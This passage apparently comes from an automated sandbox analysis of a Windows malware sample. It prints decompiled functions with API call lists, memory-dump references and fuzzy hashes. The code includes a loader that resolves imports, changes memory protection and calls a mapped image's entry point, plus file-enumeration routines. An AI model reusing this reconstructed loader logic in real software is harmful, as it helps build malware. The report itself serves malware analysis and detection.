                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _t23;
                                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                                            0x0487708c
                                                                                                                                                                                                                                                            0x0487708e
                                                                                                                                                                                                                                                            0x04877095
                                                                                                                                                                                                                                                            0x04877096
                                                                                                                                                                                                                                                            0x04877097
                                                                                                                                                                                                                                                            0x04877098
                                                                                                                                                                                                                                                            0x0487709e
                                                                                                                                                                                                                                                            0x048770a3
                                                                                                                                                                                                                                                            0x048770a3
                                                                                                                                                                                                                                                            0x048770ad
                                                                                                                                                                                                                                                            0x048770bf
                                                                                                                                                                                                                                                            0x048770c6
                                                                                                                                                                                                                                                            0x048770f5
                                                                                                                                                                                                                                                            0x048770c8
                                                                                                                                                                                                                                                            0x048770cd
                                                                                                                                                                                                                                                            0x048770f2
                                                                                                                                                                                                                                                            0x048770cf
                                                                                                                                                                                                                                                            0x048770d2
                                                                                                                                                                                                                                                            0x048770d9
                                                                                                                                                                                                                                                            0x048770e4
                                                                                                                                                                                                                                                            0x048770db
                                                                                                                                                                                                                                                            0x048770de
                                                                                                                                                                                                                                                            0x048770de
                                                                                                                                                                                                                                                            0x048770e8
                                                                                                                                                                                                                                                            0x048770e8
                                                                                                                                                                                                                                                            0x048770cd
                                                                                                                                                                                                                                                            0x048770fc

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 04872681: SysFreeString.OLEAUT32(?), ref: 04872760
                                                                                                                                                                                                                                                              • Part of subcall function 04871788: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04874464,004F0053,00000000,?), ref: 04871791
                                                                                                                                                                                                                                                              • Part of subcall function 04871788: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04874464,004F0053,00000000,?), ref: 048717BB
                                                                                                                                                                                                                                                              • Part of subcall function 04871788: memset.NTDLL ref: 048717CF
                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 048770E8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 397948122-0
                                                                                                                                                                                                                                                            • Opcode ID: 346ee31db879ab4ca9733db8c2629297848ed8c410240b6ea02004ed5842b310
                                                                                                                                                                                                                                                            • Instruction ID: 75578aaefd66ec021a0d18ab211261e63054e9f3bf7a45e4f06e10270f87262f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 346ee31db879ab4ca9733db8c2629297848ed8c410240b6ea02004ed5842b310
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7019E31600019BBDB10AFE8CC289AEBBB8FB08754B004E65E905E6020E3B0F951C792
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                                                                                                            			E00401815(void* __eax, intOrPtr _a4) {
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				 *0x404148 =  *0x404148 & 0x00000000;
                                                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                                                            				_push(0x404144);
                                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                                                                                                            				 *0x404140 = 0xc; // executed
                                                                                                                                                                                                                                                            				L004011BA(); // executed
                                                                                                                                                                                                                                                            				return __eax;
                                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                                            0x00401815
                                                                                                                                                                                                                                                            0x0040181c
                                                                                                                                                                                                                                                            0x0040181e
                                                                                                                                                                                                                                                            0x00401823
                                                                                                                                                                                                                                                            0x00401825
                                                                                                                                                                                                                                                            0x00401829
                                                                                                                                                                                                                                                            0x00401833
                                                                                                                                                                                                                                                            0x00401838

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401963,00000001,00404144,00000000), ref: 00401833
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036254659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1036280390.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DescriptorSecurity$ConvertString
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3907675253-0
                                                                                                                                                                                                                                                            • Opcode ID: 3064e51fb2027e032fce65ecb706e33d0441e64255962dda3e7b547f4940bad3
                                                                                                                                                                                                                                                            • Instruction ID: f77fc2c600970d7f663235859e73365736ae55373e6791c7a87f075bbd76c26d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3064e51fb2027e032fce65ecb706e33d0441e64255962dda3e7b547f4940bad3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3C04CF4140300A7E6209F01AD4EF05765177E4719F200529F3003E1E083F91094851D
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                            			E048716F8(long _a4) {
                                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t2 = RtlAllocateHeap( *0x487d238, 0, _a4); // executed
                                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                                            0x04871704
                                                                                                                                                                                                                                                            0x0487170a

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,0487147D), ref: 04871704
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                            • Opcode ID: b293b6d51da674e79abb256a435e4cbd0137898fe2e9401926d8ec08bffbd5b5
                                                                                                                                                                                                                                                            • Instruction ID: 7694fad0f0ef307890fad93aa8a68d56c7f67065ada071cd4f491752ae6eca84
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b293b6d51da674e79abb256a435e4cbd0137898fe2e9401926d8ec08bffbd5b5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75B01232400100EBEA015B10DD1CF05BA61EF54700F008810F30404074C735DC61EB14
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                                                            			E00401884(void* __eax, void* __edx) {
                                                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                                                            				long _t25;
                                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                                                            				intOrPtr* _t34;
                                                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                                                            				intOrPtr* _t36;
                                                                                                                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t31 = __edx;
                                                                                                                                                                                                                                                            				_t35 = __eax;
                                                                                                                                                                                                                                                            				_t17 = E004016C0( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
                                                                                                                                                                                                                                                            				if(_t17 != 0) {
                                                                                                                                                                                                                                                            					_t28 = 8;
                                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					_t34 = _v8;
                                                                                                                                                                                                                                                            					_t28 = E00401DD0( &_v8, _t34, _t35);
                                                                                                                                                                                                                                                            					if(_t28 == 0) {
                                                                                                                                                                                                                                                            						_t38 =  *((intOrPtr*)(_t34 + 0x3c)) + _t34;
                                                                                                                                                                                                                                                            						_t28 = E004013C6(_t34, _t38);
                                                                                                                                                                                                                                                            						if(_t28 == 0) {
                                                                                                                                                                                                                                                            							_t25 = E004011C0(_t38, _t31, _t34); // executed
                                                                                                                                                                                                                                                            							_t28 = _t25;
                                                                                                                                                                                                                                                            							if(_t28 == 0) {
                                                                                                                                                                                                                                                            								_push(_t25);
                                                                                                                                                                                                                                                            								_push(1);
                                                                                                                                                                                                                                                            								_push(_t34);
                                                                                                                                                                                                                                                            								if( *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x28)) + _t34))() == 0) {
                                                                                                                                                                                                                                                            									_t28 = GetLastError();
                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t36 = _v12;
                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t36 + 0x18))( *((intOrPtr*)(_t36 + 0x1c))( *_t36));
                                                                                                                                                                                                                                                            					E00401590(_t36);
                                                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                                                            					return _t28;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                                            0x00401884
                                                                                                                                                                                                                                                            0x0040188c
                                                                                                                                                                                                                                                            0x004018a9
                                                                                                                                                                                                                                                            0x004018b0
                                                                                                                                                                                                                                                            0x0040190f
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x004018b2
                                                                                                                                                                                                                                                            0x004018b2
                                                                                                                                                                                                                                                            0x004018bc
                                                                                                                                                                                                                                                            0x004018c0
                                                                                                                                                                                                                                                            0x004018c5
                                                                                                                                                                                                                                                            0x004018ce
                                                                                                                                                                                                                                                            0x004018d2
                                                                                                                                                                                                                                                            0x004018d7
                                                                                                                                                                                                                                                            0x004018dc
                                                                                                                                                                                                                                                            0x004018e0
                                                                                                                                                                                                                                                            0x004018e5
                                                                                                                                                                                                                                                            0x004018e6
                                                                                                                                                                                                                                                            0x004018ea
                                                                                                                                                                                                                                                            0x004018ef
                                                                                                                                                                                                                                                            0x004018f7
                                                                                                                                                                                                                                                            0x004018f7
                                                                                                                                                                                                                                                            0x004018ef
                                                                                                                                                                                                                                                            0x004018e0
                                                                                                                                                                                                                                                            0x004018d2
                                                                                                                                                                                                                                                            0x004018f9
                                                                                                                                                                                                                                                            0x00401902
                                                                                                                                                                                                                                                            0x00401906
                                                                                                                                                                                                                                                            0x00401910
                                                                                                                                                                                                                                                            0x00401916
                                                                                                                                                                                                                                                            0x00401916

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004016C0: GetModuleHandleA.KERNEL32(?,00000020), ref: 004016E5
                                                                                                                                                                                                                                                              • Part of subcall function 004016C0: GetProcAddress.KERNEL32(00000000,?), ref: 00401707
                                                                                                                                                                                                                                                              • Part of subcall function 004016C0: GetProcAddress.KERNEL32(00000000,?), ref: 0040171D
                                                                                                                                                                                                                                                              • Part of subcall function 004016C0: GetProcAddress.KERNEL32(00000000,?), ref: 00401733
                                                                                                                                                                                                                                                              • Part of subcall function 004016C0: GetProcAddress.KERNEL32(00000000,?), ref: 00401749
                                                                                                                                                                                                                                                              • Part of subcall function 004016C0: GetProcAddress.KERNEL32(00000000,?), ref: 0040175F
                                                                                                                                                                                                                                                              • Part of subcall function 00401DD0: memcpy.NTDLL(?,?,?,?,?,?,?,?,004018BC,?), ref: 00401DFD
                                                                                                                                                                                                                                                              • Part of subcall function 00401DD0: memcpy.NTDLL(?,?,?), ref: 00401E30
                                                                                                                                                                                                                                                              • Part of subcall function 004013C6: LoadLibraryA.KERNEL32 ref: 004013FC
                                                                                                                                                                                                                                                              • Part of subcall function 004013C6: lstrlenA.KERNEL32 ref: 00401412
                                                                                                                                                                                                                                                              • Part of subcall function 004013C6: memset.NTDLL ref: 0040141C
                                                                                                                                                                                                                                                              • Part of subcall function 004013C6: GetProcAddress.KERNEL32(?,00000002), ref: 0040147F
                                                                                                                                                                                                                                                              • Part of subcall function 004013C6: lstrlenA.KERNEL32(-00000002), ref: 00401494
                                                                                                                                                                                                                                                              • Part of subcall function 004013C6: memset.NTDLL ref: 0040149E
                                                                                                                                                                                                                                                              • Part of subcall function 004011C0: VirtualProtect.KERNELBASE(00000000,?,00000004,?), ref: 004011EE
                                                                                                                                                                                                                                                              • Part of subcall function 004011C0: VirtualProtect.KERNELBASE(00000000,?,00000004,?), ref: 00401245
                                                                                                                                                                                                                                                              • Part of subcall function 004011C0: GetLastError.KERNEL32 ref: 0040124B
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 004018F1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036254659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1036280390.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 33504255-0
                                                                                                                                                                                                                                                            • Opcode ID: 6640807119e9eaf28cd6d4d876dc85762125c05441cac10727688203532930c5
                                                                                                                                                                                                                                                            • Instruction ID: a76af504695c1b7435a733d74121567797a81c8250a8fca58db8d907ae9ba746
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6640807119e9eaf28cd6d4d876dc85762125c05441cac10727688203532930c5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1311E0736007116BD7216BEA8C45E6B77AC9F54358B04053EFA01F7391E678ED058794
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                                                            			E04872299(void* __ecx, signed char* _a4) {
                                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                                            				signed short _t11;
                                                                                                                                                                                                                                                            				signed int _t12;
                                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                                            				intOrPtr _t15;
                                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                                            				signed short* _t22;
                                                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                                                            				intOrPtr* _t27;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t24 = 0;
                                                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                                                            				_t19 = 1;
                                                                                                                                                                                                                                                            				_t27 = 0x487d330;
                                                                                                                                                                                                                                                            				E04872652();
                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                            					_t8 = E04877AA8(_a4,  &_v8); // executed
                                                                                                                                                                                                                                                            					if(_t8 == 0) {
                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_push(_v8);
                                                                                                                                                                                                                                                            					_t14 = 0xd;
                                                                                                                                                                                                                                                            					_t15 = E0487A0DB(_t14);
                                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                                            						HeapFree( *0x487d238, 0, _v8);
                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						 *_t27 = _t15;
                                                                                                                                                                                                                                                            						_t27 = _t27 + 4;
                                                                                                                                                                                                                                                            						_t24 = _t24 + 1;
                                                                                                                                                                                                                                                            						if(_t24 < 3) {
                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                                                                                            					E04872652();
                                                                                                                                                                                                                                                            					if(_t19 != 0) {
                                                                                                                                                                                                                                                            						_t22 =  *0x487d338; // 0x5259b58
                                                                                                                                                                                                                                                            						_t11 =  *_t22 & 0x0000ffff;
                                                                                                                                                                                                                                                            						if(_t11 < 0x61 || _t11 > 0x7a) {
                                                                                                                                                                                                                                                            							_t12 = _t11 & 0x0000ffff;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						 *_t22 = _t12;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					return _t19;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t19 = 0;
                                                                                                                                                                                                                                                            				goto L7;
                                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                                            0x048722a1
                                                                                                                                                                                                                                                            0x048722a5
                                                                                                                                                                                                                                                            0x048722a6
                                                                                                                                                                                                                                                            0x048722a7
                                                                                                                                                                                                                                                            0x048722ac
                                                                                                                                                                                                                                                            0x048722b1
                                                                                                                                                                                                                                                            0x048722b8
                                                                                                                                                                                                                                                            0x048722bf
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048722c1
                                                                                                                                                                                                                                                            0x048722c6
                                                                                                                                                                                                                                                            0x048722c7
                                                                                                                                                                                                                                                            0x048722ce
                                                                                                                                                                                                                                                            0x048722e8
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048722d0
                                                                                                                                                                                                                                                            0x048722d0
                                                                                                                                                                                                                                                            0x048722d2
                                                                                                                                                                                                                                                            0x048722d5
                                                                                                                                                                                                                                                            0x048722d9
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x048722db
                                                                                                                                                                                                                                                            0x048722d9
                                                                                                                                                                                                                                                            0x048722f0
                                                                                                                                                                                                                                                            0x048722f0
                                                                                                                                                                                                                                                            0x048722f2
                                                                                                                                                                                                                                                            0x048722f9
                                                                                                                                                                                                                                                            0x048722fb
                                                                                                                                                                                                                                                            0x04872301
                                                                                                                                                                                                                                                            0x04872308
                                                                                                                                                                                                                                                            0x04872318
                                                                                                                                                                                                                                                            0x04872310
                                                                                                                                                                                                                                                            0x04872313
                                                                                                                                                                                                                                                            0x04872313
                                                                                                                                                                                                                                                            0x0487231b
                                                                                                                                                                                                                                                            0x0487231b
                                                                                                                                                                                                                                                            0x04872324
                                                                                                                                                                                                                                                            0x04872324
                                                                                                                                                                                                                                                            0x048722ee
                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 04872652: GetProcAddress.KERNEL32(36776F57,048722B1), ref: 0487266D
                                                                                                                                                                                                                                                              • Part of subcall function 04877AA8: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 04877AD3
                                                                                                                                                                                                                                                              • Part of subcall function 04877AA8: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 04877AF5
                                                                                                                                                                                                                                                              • Part of subcall function 04877AA8: memset.NTDLL ref: 04877B0F
                                                                                                                                                                                                                                                              • Part of subcall function 04877AA8: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04877B4D
                                                                                                                                                                                                                                                              • Part of subcall function 04877AA8: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04877B61
                                                                                                                                                                                                                                                              • Part of subcall function 04877AA8: FindCloseChangeNotification.KERNELBASE(00000000), ref: 04877B78
                                                                                                                                                                                                                                                              • Part of subcall function 04877AA8: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04877B84
                                                                                                                                                                                                                                                              • Part of subcall function 04877AA8: lstrcat.KERNEL32(?,642E2A5C), ref: 04877BC5
                                                                                                                                                                                                                                                              • Part of subcall function 04877AA8: FindFirstFileA.KERNELBASE(?,?), ref: 04877BDB
                                                                                                                                                                                                                                                              • Part of subcall function 0487A0DB: lstrlen.KERNEL32(?,00000000,0487D330,00000001,048722CC,0487D00C,0487D00C,00000000,00000005,00000000,00000000,?,?,?,04877E0E,048791A4), ref: 0487A0E4
                                                                                                                                                                                                                                                              • Part of subcall function 0487A0DB: mbstowcs.NTDLL ref: 0487A10B
                                                                                                                                                                                                                                                              • Part of subcall function 0487A0DB: memset.NTDLL ref: 0487A11D
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,0487D00C,0487D00C,0487D00C,00000000,00000005,00000000,00000000,?,?,?,04877E0E,048791A4,0487D00C,?,048791A4), ref: 048722E8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 983081259-0
                                                                                                                                                                                                                                                            • Opcode ID: 302ac35c8afb5fe0c50b76c56bced04d10fb6494e1beba61bb329d2c08968968
                                                                                                                                                                                                                                                            • Instruction ID: 302a156a7204ab0ab6726c2a1d61c4e6c79f29e74c3750761127077e75095367
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 302ac35c8afb5fe0c50b76c56bced04d10fb6494e1beba61bb329d2c08968968
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83016D33710204ABF7009AAECCA4B6EB295EF41358F000EB6EA44D7050D5A4FC42A366
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                            			E04878FAB(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                                                                                                                                                                                                                            				signed short _t18;
                                                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                                            				signed short _t27;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				if(_a4 != 0) {
                                                                                                                                                                                                                                                            					_t18 = E04877082(_a4, _a8, _a12, __esi); // executed
                                                                                                                                                                                                                                                            					_t27 = _t18;
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					_t27 = E04876E8F(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                                                                                                                                                                                                                                            					if(_t27 == 0) {
                                                                                                                                                                                                                                                            						_t26 = _a8 >> 1;
                                                                                                                                                                                                                                                            						if(_t26 == 0) {
                                                                                                                                                                                                                                                            							_t27 = 2;
                                                                                                                                                                                                                                                            							HeapFree( *0x487d238, 0, _a12);
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							_t24 = _a12;
                                                                                                                                                                                                                                                            							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
                                                                                                                                                                                                                                                            							 *__esi = _t24;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _t27;
                                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                                            0x04878fb3
                                                                                                                                                                                                                                                            0x04879008
                                                                                                                                                                                                                                                            0x0487900d
                                                                                                                                                                                                                                                            0x04878fb5
                                                                                                                                                                                                                                                            0x04878fcf
                                                                                                                                                                                                                                                            0x04878fd3
                                                                                                                                                                                                                                                            0x04878fd8
                                                                                                                                                                                                                                                            0x04878fda
                                                                                                                                                                                                                                                            0x04878fea
                                                                                                                                                                                                                                                            0x04878ff6
                                                                                                                                                                                                                                                            0x04878fdc
                                                                                                                                                                                                                                                            0x04878fdc
                                                                                                                                                                                                                                                            0x04878fdf
                                                                                                                                                                                                                                                            0x04878fe4
                                                                                                                                                                                                                                                            0x04878fe4
                                                                                                                                                                                                                                                            0x04878fda
                                                                                                                                                                                                                                                            0x04878fd3
                                                                                                                                                                                                                                                            0x04879013

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,00000000,80000002,73BCF710,?,?,73BCF710,00000000,?,04879DAF,?,004F0053,05259378,00000000,?), ref: 04878FF6
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                                                                                                                            • Opcode ID: 5e2018045239ebd4e9613413389b2a1cc0f7c08031b61945ab89f896648079a0
                                                                                                                                                                                                                                                            • Instruction ID: fb239f76c5fe2c62063597cdef8140138a8a78f510ca77c51580779c7e31ff7d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e2018045239ebd4e9613413389b2a1cc0f7c08031b61945ab89f896648079a0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69011232100249FBDB11AF58CC55FAE3766FF44350F148919FA559A150D771E521D750
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                                                            			E0487A1A2(intOrPtr* __edi) {
                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                            				intOrPtr _t15;
                                                                                                                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t21 = __edi;
                                                                                                                                                                                                                                                            				_push( &_v12);
                                                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                                                            				_v8 = 0x1d4c0;
                                                                                                                                                                                                                                                            				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                            					_v16 = _t15;
                                                                                                                                                                                                                                                            					Sleep(0x1f4); // executed
                                                                                                                                                                                                                                                            					if(_v12 == 4) {
                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					if(_v8 == 0) {
                                                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                                                            						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						if(_v8 <= 0x1f4) {
                                                                                                                                                                                                                                                            							_v16 = 0x80004004;
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							_v8 = _v8 - 0x1f4;
                                                                                                                                                                                                                                                            							goto L4;
